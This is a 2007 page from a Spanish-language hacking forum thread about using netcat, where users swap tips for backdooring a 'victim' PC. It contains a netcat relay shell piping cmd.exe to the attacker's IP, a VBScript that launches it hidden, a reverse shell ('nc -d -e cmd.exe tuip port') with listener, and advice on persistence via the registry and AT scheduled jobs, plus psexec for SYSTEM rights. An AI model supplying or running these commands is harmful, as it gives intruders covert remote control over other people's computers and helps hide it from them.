elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Security Series.XSS. [Cross Site Scripting]


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Jugando con netcat
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 65 Ir Abajo Respuesta Imprimir
Autor Tema: Jugando con netcat  (Leído 291,606 veces)
Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #70 en: 16 Abril 2007, 00:35 am »

Creo que es normal que pase eso, a mi siempre me paso.. hay algunas opciones que no se pueden usar con netcat.. una de ellas es edit  :(
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Marth

Desconectado Desconectado

Mensajes: 2


Ver Perfil
Re: Jugando con netcat
« Respuesta #71 en: 24 Abril 2007, 05:02 am »

ola bueno soy nuevo y si me funciono lo del netcat la parte 1 pero lo que quiero saber cuales son los comandos para poder borrar archivos cosas asi porfa me gustaria saber =P que al = que tu quiero cobrar un favor XD aparte apoya a los chilenos XD
En línea

ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #72 en: 24 Abril 2007, 13:37 pm »

Pues aqui lo puedes ver..

TUTORIAL PROGRAMACION BAT
http://foro.elhacker.net/index.php/topic,18148.0.html
En línea

Falso Positivo

Desconectado Desconectado

Mensajes: 243



Ver Perfil WWW
Re: Jugando con netcat
« Respuesta #73 en: 24 Abril 2007, 14:22 pm »

Citar
Publicado por: WHK
...la unica que no funciona aún es donde dice "ejecutar en modo system" porque me las estoy ingeniando para adelantar un minuto sobre el comando AT que posibilita ejecuciones en modo SYSTEM.
Ejecuta el proceso con psexec.

Citar
Publicado por: santyuste
...Se me conecta bien, pero cuando uso el edit.exe o cualquier otro programa similar no me aparece por pantalla.
Si quieres editar algun archivo tipo txt, bat, el comando "edit" solo hara q "tildes" tu shell, mejor bajate de la victima el arcxhivo por por tftp, ftp, etc modificalo localmente y luego lo vuelves a subir.

Salu2.
En línea

Don't worry, be hacked....
ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #74 en: 24 Abril 2007, 19:23 pm »

Yo lo que sigo buscando es como ocultar la ventana que te sale al ejecutar el SFX...
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #75 en: 24 Abril 2007, 19:28 pm »

De que tipo de ventana estamos hablando?? de ms-dos?? la de winrar??
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
ne0x

Desconectado Desconectado

Mensajes: 270



Ver Perfil
Re: Jugando con netcat
« Respuesta #76 en: 24 Abril 2007, 22:53 pm »

MS-DOS, es decir, la que se origina al ejecutar:

cmd /c "nc -d TU_IP 21 | cmd.exe | nc -d TU_IP 25"
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #77 en: 24 Abril 2007, 23:00 pm »

Yo lo que hago cuando se trata de ejecutar algun comando de ms-dos oculto es meterlo en un *.vbs.... siempre doy vueltas con este lenguaje, y me gusta, pero es que a mi me sirve  :P, y resulta mas funcional que batch

Código:
set objshell = createobject("wscript.shell")
objshell.run "cmd /c nc -d TU_IP 21 | cmd.exe | nc -d TU_IP 25", vbhide

Espero te solucione algo

 :D
« Última modificación: 24 Abril 2007, 23:08 pm por novlucker » En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Alesiter

Desconectado Desconectado

Mensajes: 187



Ver Perfil
Re: Jugando con netcat
« Respuesta #78 en: 25 Abril 2007, 16:09 pm »

en "troyanisando al netcat" si la victima tiene la ip dinamica
no me sirve de nada ponerlo el netcat en el registro para q se inicie automaticamente cada q se enciende la pc, porq cuando entre a internet ya no tendra la misma ip y no servira de nada,como puedo solucionar este problema?
En línea

Novlucker
Ninja y
Colaborador
***
Desconectado Desconectado

Mensajes: 10.683

Yo que tu lo pienso dos veces


Ver Perfil
Re: Jugando con netcat
« Respuesta #79 en: 25 Abril 2007, 16:31 pm »

Conexion inversa:

En tu pc:
nc -vv -l -p nrodepuerto

Pc victima:
nc -d -e cmd.exe tuip nrodepuerto
Deberias de incluirlo con un AT para que lo haga a una determinada hora en la que vas a estar conectado

Si recien empiezas puedes ver tambien el paper de Zhyzura:
http://foro.elhacker.net/index.php/topic,58032.0.html
En línea

Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD
"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein
Páginas: 1 2 3 4 5 6 7 [8] 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 ... 65 Ir Arriba Respuesta Imprimir 

Ir a:  
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines